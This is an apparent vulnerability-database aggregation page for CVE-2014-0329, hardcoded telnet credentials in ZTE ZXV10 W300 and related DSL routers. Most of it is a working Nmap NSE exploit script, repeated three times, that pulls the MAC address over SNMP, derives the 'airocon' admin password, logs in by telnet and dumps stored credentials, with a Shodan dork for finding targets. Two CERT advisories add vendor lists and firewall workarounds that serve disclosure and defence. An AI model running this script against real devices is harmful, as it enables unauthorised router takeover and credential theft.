ZTE ZXV10 W300 Router - Hardcoded Credentials

2014-07-01T00:00:00

Description

No description provided by source.

{"href": "https://www.seebug.org/vuldb/ssvid-84851", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "ZTE ZXV10 W300 Router - Hardcoded Credentials", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-84851", "cvelist": ["CVE-2014-0329"], "description": "No description provided by source.", "viewCount": 12, "published": "2014-07-01T00:00:00", "sourceData": "\n # Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials\r\n# Date: 03 Feb 2014\r\n# Exploit Author: Cesar Neira\r\n# Vendor Homepage: http://wwwen.zte.com.cn/\r\n# Version: ZTE ZXV10 W300 v2.1\r\n# CVE : CVE-2014-0329\r\n# Dork (Shodan): Basic realm="index.htm"\r\n# References:\r\nhttp://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\r\n\r\n\r\nlocal nmap = require "nmap"\r\nlocal stdnse = require "stdnse"\r\nlocal snmp = require "snmp"\r\nlocal vulns = require "vulns"\r\n\r\ndescription = [[\r\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the\r\ntelnet service on the device. The username is "admin" and the password is\r\n"XXXXairocon" where "XXXX" is the last four characters of the device's MAC\r\naddress. The MAC address is obtainable over SNMP with community string public.\r\n]]\r\nauthor = "Cesar Neira"\r\nlicense = "Same as Nmap--See http://nmap.org/book/man-legal.html"\r\ncategories = {"vuln", "exploit", "intrusive"}\r\n\r\n---\r\n--\r\n-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 23/tcp open telnet\r\n-- 161/udp open|filtered snmp\r\n-- \r\n-- Host script results:\r\n-- | airocon: \r\n-- | VULNERABLE:\r\n-- | ZTE ZXV10 W300 router contains hardcoded credentials\r\n-- | State: VULNERABLE (Exploitable)\r\n-- | IDs: CVE:CVE-2014-0329\r\n-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)\r\n-- | Description:\r\n-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\r\n-- | service on the device. The username is "admin" and the password is "XXXXairocon"\r\n-- | where "XXXX" is the last four characters of the device's MAC address. The MAC address\r\n-- | is obtainable over SNMP with community string public.\r\n-- | Disclosure date: 2014-2-3\r\n-- | Exploit results:\r\n-- | admin:1234\r\n-- | support:1234\r\n-- | admin:0E91airocon\r\n-- | References:\r\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329\r\n-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\r\n-- |_ http://www.kb.cert.org/vuls/id/228886\r\n\r\n-- @args community SNMP community (Default: public)\r\n--\r\n---\r\n\r\n\r\nlocal DEFAULT_COMMUNITY = "public"\r\n\r\n\r\nhostrule = function(host)\r\n local snmp_port, telnet_port\r\n \r\n snmp_port = nmap.get_port_state(host, {number=161, protocol="udp"})\r\n if not snmp_port and not (snmp_port.state == "open" or snmp_port.state == "open|filtered") then\r\n return false\r\n end\r\n \r\n telnet_port = nmap.get_port_state(host, {number=23, protocol="tcp"})\r\n if not telnet_port and not telnet_port.state == "open" then\r\n return false\r\n end\r\n \r\n return true\r\nend\r\n\r\n\r\nlocal get_mac = function(host, community)\r\n\tlocal socket, status, response\r\n\t\r\n\tsocket = nmap.new_socket("udp")\r\n\tsocket:set_timeout(5000)\r\n\r\n\tstatus, response = socket:connect(host, 161)\r\n\t\r\n\tif not status then\r\n\t socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n\tlocal payload, request\r\n\r\n\trequest = snmp.buildGetRequest({}, ".1.3.6.1.2.1.2.2.1.6.10000")\r\n\tpayload = snmp.encode(snmp.buildPacket(request, 0, community))\r\n\t\r\n\tstatus, response = socket:send(payload)\r\n\t\r\n\tif not status then\r\n\t socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n status, response = socket:receive_bytes(1)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n socket:close()\r\n \r\n local result\r\n\tresult = snmp.fetchFirst(response)\r\n \r\n if not result then\r\n return false, "Unexpected response value."\r\n end\r\n \r\n return true, stdnse.tohex(result)\r\nend\r\n\r\n\r\nlocal dump_creds = function(host, user, password)\r\n local socket, status, response\r\n \r\n socket = nmap.new_socket("tcp")\r\n socket:set_timeout(5000)\r\n \r\n status, response = socket:connect(host, 23)\r\n \r\n if not status then\r\n socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n\tlocal payload\r\n\tpayload = user .. "\\r" .. password .. "\\rsh\\rlogin show\\rexit\\r"\r\n\t\r\n\tstatus, response = socket:send(payload)\r\n\t\r\n\tif not status then\r\n\t socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n\tstatus, response = socket:receive_buf("exit", false)\r\n\t\r\n\tif not status then\r\n\t socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n\tsocket:close()\r\n\t\r\n\treturn true, response\r\nend\r\n\r\n\r\nlocal parse_response = function(response)\r\n local index\r\n \r\n\tindex = string.find(response, "Username +Password +Priority")\r\n\t\r\n\tif not index then\r\n\t return false, "Unexpected response value."\r\n\tend\r\n\r\n\tindex = string.find(response, "\\r\\n", index) + 2\r\n\tresponse = string.sub(response, index)\r\n\r\n local result, endl, line\r\n result = {}\r\n\t\r\n\tindex = 0\r\n\tendl = string.find(response, "\\r\\n", index)\r\n\r\n\twhile endl do\r\n\t line = string.sub(response, index, endl)\r\n\t line = string.gsub(line, "\\r", "")\r\n line = string.gsub(line, "^ +", "")\r\n line = string.gsub(line, " +$", "")\r\n line = string.gsub(line, " +", " ")\r\n \r\n local user, pass, prio\r\n for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do\r\n local aux = {}\r\n aux['username'] = user\r\n aux['password'] = pass\r\n aux['priority'] = prio\r\n table.insert(result, aux)\r\n end\r\n\t \r\n\t index = endl + 2\r\n\t endl = string.find(response, "\\r\\n", index)\r\n\tend\r\n\t\r\n return true, result\r\nend\r\n\r\n\r\naction = function(host)\r\n local vuln = {\r\n title = "ZTE ZXV10 W300 router contains hardcoded credentials",\r\n state = vulns.STATE.NOT_VULN,\r\n IDS = {CVE = 'CVE-2014-0329'},\r\n risk_factor = "High",\r\n scores = {\r\n CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",\r\n },\r\n description = [[\r\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\r\nservice on the device. The username is "admin" and the password is "XXXXairocon"\r\nwhere "XXXX" is the last four characters of the device's MAC address. The MAC address\r\nis obtainable over SNMP with community string public.]],\r\n references = {\r\n "http://www.kb.cert.org/vuls/id/228886",\r\n "http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"\r\n },\r\n dates = {\r\n disclosure = {year = 2014, month = 2, day = 3},\r\n },\r\n exploit_results = {},\r\n }\r\n\r\n local community\r\n community = stdnse.get_script_args(SCRIPT_NAME .. ".community") or DEFAULT_COMMUNITY\r\n \r\n local status, response\r\n \r\n status, response = get_mac(host, community) \r\n if not status then\r\n return response\r\n end\r\n \r\n local password\r\n password = string.upper(string.sub(response, 9)) .. "airocon"\r\n \r\n status, response = dump_creds(host, "admin", password)\r\n if not status then\r\n return response\r\n end\r\n \r\n status, response = parse_response( response )\r\n if not status then\r\n return response\r\n end\r\n \r\n vuln.state = vulns.STATE.EXPLOIT\r\n for _, data in pairs(response) do\r\n table.insert(vuln.exploit_results, data.username .. ":" .. data.password)\r\n end\r\n \r\n return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)\r\nend\r\n\n ", "id": "SSV:84851", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:13:10", "reporter": "Root", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:228886", "VU:950576"]}, {"type": "cve", "idList": ["CVE-2014-0329"]}, {"type": "exploitdb", "idList": ["EDB-ID:31527"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BA779BA3CB0B91209CEA31E14EBF8B3B"]}, {"type": "nessus", "idList": ["ZTE_ZXV10_BACKDOOR.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125142"]}, {"type": "seebug", "idList": ["SSV:61413"]}, {"type": "zdt", "idList": ["1337DAY-ID-21875"]}], "rev": 4}, "backreferences": {"references": [{"type": "cert", "idList": ["VU:228886"]}, {"type": "cve", "idList": ["CVE-2014-0329"]}, {"type": "nessus", "idList": ["ZTE_ZXV10_BACKDOOR.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125142"]}]}, "exploitation": null, "vulnersScore": -0.0}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659709850}}

{"cert": [{"lastseen": "2021-09-28T17:54:00", "description": "### Overview\n\nZTE ZXV10 W300 router version 2.1.0, and possibly earlier versions, contains hardcoded credentials. ([CWE-798](<http://cwe.mitre.org/data/definitions/798.html>))\n\n### Description\n\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet service on the device. The username is \"`admin`\" and the password is \"`XXXXairocon`\" where \"`XXXX`\" is the last four characters of the device's MAC address. The MAC address is obtainable over SNMP with community string `public`.\n\nThe [vendor has provided a statement](<http://www.kb.cert.org/vuls/id/JALR-9FYNWQ>) about this vulnerability. \n \n--- \n \n### Impact\n\nA remote unauthenticated attacker may be able to obtain the MAC address of the device and log into the telnet service of the device with hardcoded credentials. \n \n--- \n \n### Solution\n\nWe are currently unaware of a practical solution to this problem. Please consider the following workaround. \n \n--- \n \n**Restrict Access** \n \nEnable firewall rules so the telnet service of the device is not accessible to untrusted sources. Enable firewall rules that block SNMP on the device. \n \n--- \n \n### Vendor Information\n\n228886\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### ZTE Corporation __ Affected\n\nNotified: December 03, 2013 Updated: March 14, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n'According to the vulnerability found in ZTE ZXV10 W300 router version 2.1.0, a mitigation measure has been adopted in the W300 general frame structure versions after 2011, which means the ZTE ZXV10 W300 router produced since 2011 has closed the telnet default function to avoid the information security \n\nincident caused by such vulnerability. If any customer has a special requirement, please follow the instructions in our product manual to open the telnet function, but ZTE will not bear the legal liability for any security incident loss that might be the consequence of this operation. If you have any questions please contact us by calling our 24h service hotline +86-755-26770188.'\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 7.2 | E:POC/RL:W/RC:UC \nEnvironmental | 5.4 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://cwe.mitre.org/data/definitions/798.html>\n * <http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html>\n\n### Acknowledgements\n\nThanks to Cesar Neira for reporting this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0329](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-0329>) \n---|--- \n**Date Public:** | 2014-02-03 \n**Date First Published:** | 2014-02-03 \n**Date Last Updated: ** | 2014-03-14 20:04 UTC \n**Document Revision: ** | 12 \n", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "cert", "title": "ZTE ZXV10 W300 router contains hardcoded credentials", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0329"], "modified": "2014-03-14T20:04:00", "id": "VU:228886", "href": "https://www.kb.cert.org/vuls/id/228886", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-28T17:51:58", "description": "### Overview\n\nDSL routers by ASUS, DIGICOM, [Observa Telecom](<http://seclists.org/fulldisclosure/2015/May/129>), Philippine Long Distance Telephone (PLDT), and [ZTE](<https://www.kb.cert.org/vuls/id/228886>) contain hard-coded \"`XXXXairocon`\" credentials\n\n### Description\n\n[**CWE-798**](<http://cwe.mitre.org/data/definitions/798.html>)**: Use of Hard-coded Credentials**\n\nDSL routers, including the [ASUS DSL-N12E](<https://www.asus.com/Networking/DSLN12E/>), [DIGICOM DG-5524T](<http://www.digicom.com.hk/index.php?section=products&action=details&id=156#.VdzITpcuzl0>), [](<http://seclists.org/fulldisclosure/2015/May/129>)[Observa Telecom RTA01N](<http://www.movistar.es/particulares/atencion-cliente/internet/adsl/equipamiento-adsl/routers/router-adsl-observa-rta01n-v2/>), Philippine Long Distance Telephone (PLDT) SpeedSurf 504AN and Kasda KW58293, and ZTE ZXV10 W300 contain hard-coded credentials that are useable in the telnet service on the device. In the ASUS, DIGICOM, Observa Telecom, and ZTE devices, the username is \"`admin`,\" in the PLDT devices, the user name is \"`adminpldt`,\" and in all affected devices, the password is \"`XXXXairocon`\" where \"`XXXX`\" is the last four characters of the device's MAC address. The MAC address may be obtainable over SNMP with community string `public`. \n \nThe vulnerability was [previously disclosed in VU#228886](<https://www.kb.cert.org/vuls/id/228886>) and assigned CVE-2014-0329 for ZTE ZXV10 W300, but it was not known at the time that the same vulnerability affected products published by other vendors. The Observa Telecom RTA01N was [previously disclosed on the Full Disclosure mailing list](<http://seclists.org/fulldisclosure/2015/May/129>). \n \n--- \n \n### Impact\n\nA remote attacker may utilize these credentials to gain administrator access to the device. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of a practical solution to this problem and recommends the following workaround: \n \n--- \n \n**Restrict access** \n \nEnable firewall rules so the telnet service of the device is not accessible to untrusted sources. Enable firewall rules that block SNMP on the device. \n \n--- \n \n### Vendor Information\n\n950576\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### AsusTek Computer Inc. __ Affected\n\nNotified: May 04, 2015 Updated: August 25, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nThe Asus DSL-N12E is affected.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23950576 Feedback>).\n\n### DIGICOM (HK) __ Affected\n\nUpdated: August 25, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://www.digicom.com.hk/index.php?section=products&action=details&id=156#.VdzITpcuzl0](<http://www.digicom.com.hk/index.php?section=products&action=details&id=156#.VdzITpcuzl0>)\n\n### Addendum\n\nDIGICOM DG-5624T is affected.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23950576 Feedback>).\n\n### Observa Telecom __ Affected\n\nUpdated: August 25, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.movistar.es/particulares/atencion-cliente/internet/adsl/equipamiento-adsl/routers/router-adsl-observa-rta01n-v2/>\n\n### Addendum\n\nObserva Telecom RTA01N is affected.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23950576 Feedback>).\n\n### Philippine Long Distance Telephone __ Affected\n\nNotified: June 02, 2015 Updated: August 27, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nPhilippine Long Distance Telephone SpeedSurf 504AN and Kasda KW58293 are affected.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23950576 Feedback>).\n\n### ZTE Corporation __ Affected\n\nNotified: December 03, 2013 Updated: August 25, 2015 \n\n**Statement Date: March 12, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n'According to the vulnerability found in ZTE ZXV10 W300 router version 2.1.0, a mitigation measure has been adopted in the W300 general frame structure versions after 2011, which means the ZTE ZXV10 W300 router produced since 2011 has closed the telnet default function to avoid the information security \n\nincident caused by such vulnerability. If any customer has a special requirement, please follow the instructions in our product manual to open the telnet function, but ZTE will not bear the legal liability for any security incident loss that might be the consequence of this operation. If you have any questions please contact us by calling our 24h service hotline +86-755-26770188.'\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 8 | E:POC/RL:U/RC:UR \nEnvironmental | 6.0 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://seclists.org/fulldisclosure/2015/May/129>\n * <https://www.kb.cert.org/vuls/id/228886>\n * <https://www.asus.com/Networking/DSLN12E/>\n * [http://www.digicom.com.hk/index.php?section=products&action=details&id=156#.VdzITpcuzl0](<http://www.digicom.com.hk/index.php?section=products&action=details&id=156#.VdzITpcuzl0>)\n * <http://www.movistar.es/particulares/atencion-cliente/internet/adsl/equipamiento-adsl/routers/router-adsl-observa-rta01n-v2/>\n\n### Acknowledgements\n\nThanks to Walter Mostosi for reporting the issue affecting ASUS devices, Naresh LamGarde for DIGICOM devices, and to Eskie Cirrus James Maquilang for PLDT devices. Thanks again to Cesar Neira for reporting the issue in ZTE devices, and to Jose Antonio Rodriguez Garcia for disclosing the Observa Telecom vulnerability to Full Disclosure.\n\nThis document was written by Joel Land and Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [None](<http://web.nvd.nist.gov/vuln/detail/None>) \n---|--- \n**Date Public:** | 2015-08-25 \n**Date First Published:** | 2015-08-25 \n**Date Last Updated: ** | 2015-08-27 15:19 UTC \n**Document Revision: ** | 19 \n", "cvss3": {}, "published": "2015-08-25T00:00:00", "type": "cert", "title": "DSL routers contain hard-coded \"XXXXairocon\" credentials", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0329"], "modified": "2015-08-27T15:19:00", "id": "VU:950576", "href": "https://www.kb.cert.org/vuls/id/950576", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:38", "description": "\nZTE ZXV10 W300 Router - Hard-Coded Credentials", "edition": 2, "published": "2014-02-09T00:00:00", "title": "ZTE ZXV10 W300 Router - Hard-Coded Credentials", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0329"], "modified": "2014-02-09T00:00:00", "id": "EXPLOITPACK:BA779BA3CB0B91209CEA31E14EBF8B3B", "href": "", "sourceData": "# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials\n# Date: 03 Feb 2014\n# Exploit Author: Cesar Neira\n# Vendor Homepage: http://wwwen.zte.com.cn/\n# Version: ZTE ZXV10 W300 v2.1\n# CVE : CVE-2014-0329\n# Dork (Shodan): Basic realm=\"index.htm\"\n# References:\nhttp://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\n\n\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal snmp = require \"snmp\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the\ntelnet service on the device. The username is \"admin\" and the password is\n\"XXXXairocon\" where \"XXXX\" is the last four characters of the device's MAC\naddress. The MAC address is obtainable over SNMP with community string public.\n]]\nauthor = \"Cesar Neira\"\nlicense = \"Same as Nmap--See http://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"exploit\", \"intrusive\"}\n\n---\n--\n-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org\n-- @output\n-- PORT STATE SERVICE\n-- 23/tcp open telnet\n-- 161/udp open|filtered snmp\n-- \n-- Host script results:\n-- | airocon: \n-- | VULNERABLE:\n-- | ZTE ZXV10 W300 router contains hardcoded credentials\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:CVE-2014-0329\n-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)\n-- | Description:\n-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\n-- | service on the device. The username is \"admin\" and the password is \"XXXXairocon\"\n-- | where \"XXXX\" is the last four characters of the device's MAC address. The MAC address\n-- | is obtainable over SNMP with community string public.\n-- | Disclosure date: 2014-2-3\n-- | Exploit results:\n-- | admin:1234\n-- | support:1234\n-- | admin:0E91airocon\n-- | References:\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329\n-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\n-- |_ http://www.kb.cert.org/vuls/id/228886\n\n-- @args community SNMP community (Default: public)\n--\n---\n\n\nlocal DEFAULT_COMMUNITY = \"public\"\n\n\nhostrule = function(host)\n local snmp_port, telnet_port\n \n snmp_port = nmap.get_port_state(host, {number=161, protocol=\"udp\"})\n if not snmp_port and not (snmp_port.state == \"open\" or snmp_port.state == \"open|filtered\") then\n return false\n end\n \n telnet_port = nmap.get_port_state(host, {number=23, protocol=\"tcp\"})\n if not telnet_port and not telnet_port.state == \"open\" then\n return false\n end\n \n return true\nend\n\n\nlocal get_mac = function(host, community)\n\tlocal socket, status, response\n\t\n\tsocket = nmap.new_socket(\"udp\")\n\tsocket:set_timeout(5000)\n\n\tstatus, response = socket:connect(host, 161)\n\t\n\tif not status then\n\t socket:close()\n\t return status, response\n\tend\n\t\n\tlocal payload, request\n\n\trequest = snmp.buildGetRequest({}, \".1.3.6.1.2.1.2.2.1.6.10000\")\n\tpayload = snmp.encode(snmp.buildPacket(request, 0, community))\n\t\n\tstatus, response = socket:send(payload)\n\t\n\tif not status then\n\t socket:close()\n\t return status, response\n\tend\n\t\n status, response = socket:receive_bytes(1)\n \n if not status then\n socket:close()\n return status, response\n end\n \n socket:close()\n \n local result\n\tresult = snmp.fetchFirst(response)\n \n if not result then\n return false, \"Unexpected response value.\"\n end\n \n return true, stdnse.tohex(result)\nend\n\n\nlocal dump_creds = function(host, user, password)\n local socket, status, response\n \n socket = nmap.new_socket(\"tcp\")\n socket:set_timeout(5000)\n \n status, response = socket:connect(host, 23)\n \n if not status then\n socket:close()\n\t return status, response\n\tend\n\t\n\tlocal payload\n\tpayload = user .. \"\\r\" .. password .. \"\\rsh\\rlogin show\\rexit\\r\"\n\t\n\tstatus, response = socket:send(payload)\n\t\n\tif not status then\n\t socket:close()\n\t return status, response\n\tend\n\t\n\tstatus, response = socket:receive_buf(\"exit\", false)\n\t\n\tif not status then\n\t socket:close()\n\t return status, response\n\tend\n\t\n\tsocket:close()\n\t\n\treturn true, response\nend\n\n\nlocal parse_response = function(response)\n local index\n \n\tindex = string.find(response, \"Username +Password +Priority\")\n\t\n\tif not index then\n\t return false, \"Unexpected response value.\"\n\tend\n\n\tindex = string.find(response, \"\\r\\n\", index) + 2\n\tresponse = string.sub(response, index)\n\n local result, endl, line\n result = {}\n\t\n\tindex = 0\n\tendl = string.find(response, \"\\r\\n\", index)\n\n\twhile endl do\n\t line = string.sub(response, index, endl)\n\t line = string.gsub(line, \"\\r\", \"\")\n line = string.gsub(line, \"^ +\", \"\")\n line = string.gsub(line, \" +$\", \"\")\n line = string.gsub(line, \" +\", \" \")\n \n local user, pass, prio\n for user, pass, prio in string.gmatch(line, \"([^ ]+) ([^ ]+) ([^ ]+)\") do\n local aux = {}\n aux['username'] = user\n aux['password'] = pass\n aux['priority'] = prio\n table.insert(result, aux)\n end\n\t \n\t index = endl + 2\n\t endl = string.find(response, \"\\r\\n\", index)\n\tend\n\t\n return true, result\nend\n\n\naction = function(host)\n local vuln = {\n title = \"ZTE ZXV10 W300 router contains hardcoded credentials\",\n state = vulns.STATE.NOT_VULN,\n IDS = {CVE = 'CVE-2014-0329'},\n risk_factor = \"High\",\n scores = {\n CVSSv2 = \"9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)\",\n },\n description = [[\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\nservice on the device. The username is \"admin\" and the password is \"XXXXairocon\"\nwhere \"XXXX\" is the last four characters of the device's MAC address. The MAC address\nis obtainable over SNMP with community string public.]],\n references = {\n \"http://www.kb.cert.org/vuls/id/228886\",\n \"http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\"\n },\n dates = {\n disclosure = {year = 2014, month = 2, day = 3},\n },\n exploit_results = {},\n }\n\n local community\n community = stdnse.get_script_args(SCRIPT_NAME .. \".community\") or DEFAULT_COMMUNITY\n \n local status, response\n \n status, response = get_mac(host, community) \n if not status then\n return response\n end\n \n local password\n password = string.upper(string.sub(response, 9)) .. \"airocon\"\n \n status, response = dump_creds(host, \"admin\", password)\n if not status then\n return response\n end\n \n status, response = parse_response( response )\n if not status then\n return response\n end\n \n vuln.state = vulns.STATE.EXPLOIT\n for _, data in pairs(response) do\n table.insert(vuln.exploit_results, data.username .. \":\" .. data.password)\n end\n \n return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)\nend", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-01T09:14:14", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2014-02-09T00:00:00", "type": "zdt", "title": "ZTE ZXV10 W300 Router - Hardcoded Credentials", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0329"], "modified": "2014-02-09T00:00:00", "id": "1337DAY-ID-21875", "href": "https://0day.today/exploit/description/21875", "sourceData": "# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials\r\n# Date: 03 Feb 2014\r\n# Exploit Author: Cesar Neira\r\n# Vendor Homepage: http://wwwen.zte.com.cn/\r\n# Version: ZTE ZXV10 W300 v2.1\r\n# CVE : CVE-2014-0329\r\n# Dork (Shodan): Basic realm=\"index.htm\"\r\n# References:\r\nhttp://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\r\n \r\n \r\nlocal nmap = require \"nmap\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal snmp = require \"snmp\"\r\nlocal vulns = require \"vulns\"\r\n \r\ndescription = [[\r\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the\r\ntelnet service on the device. The username is \"admin\" and the password is\r\n\"XXXXairocon\" where \"XXXX\" is the last four characters of the device's MAC\r\naddress. The MAC address is obtainable over SNMP with community string public.\r\n]]\r\nauthor = \"Cesar Neira\"\r\nlicense = \"Same as Nmap--See http://nmap.org/book/man-legal.html\"\r\ncategories = {\"vuln\", \"exploit\", \"intrusive\"}\r\n \r\n---\r\n--\r\n-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 23/tcp open telnet\r\n-- 161/udp open|filtered snmp\r\n-- \r\n-- Host script results:\r\n-- | airocon:\r\n-- | VULNERABLE:\r\n-- | ZTE ZXV10 W300 router contains hardcoded credentials\r\n-- | State: VULNERABLE (Exploitable)\r\n-- | IDs: CVE:CVE-2014-0329\r\n-- | Risk factor: High CVSSv2: 9.3 (HIGH) 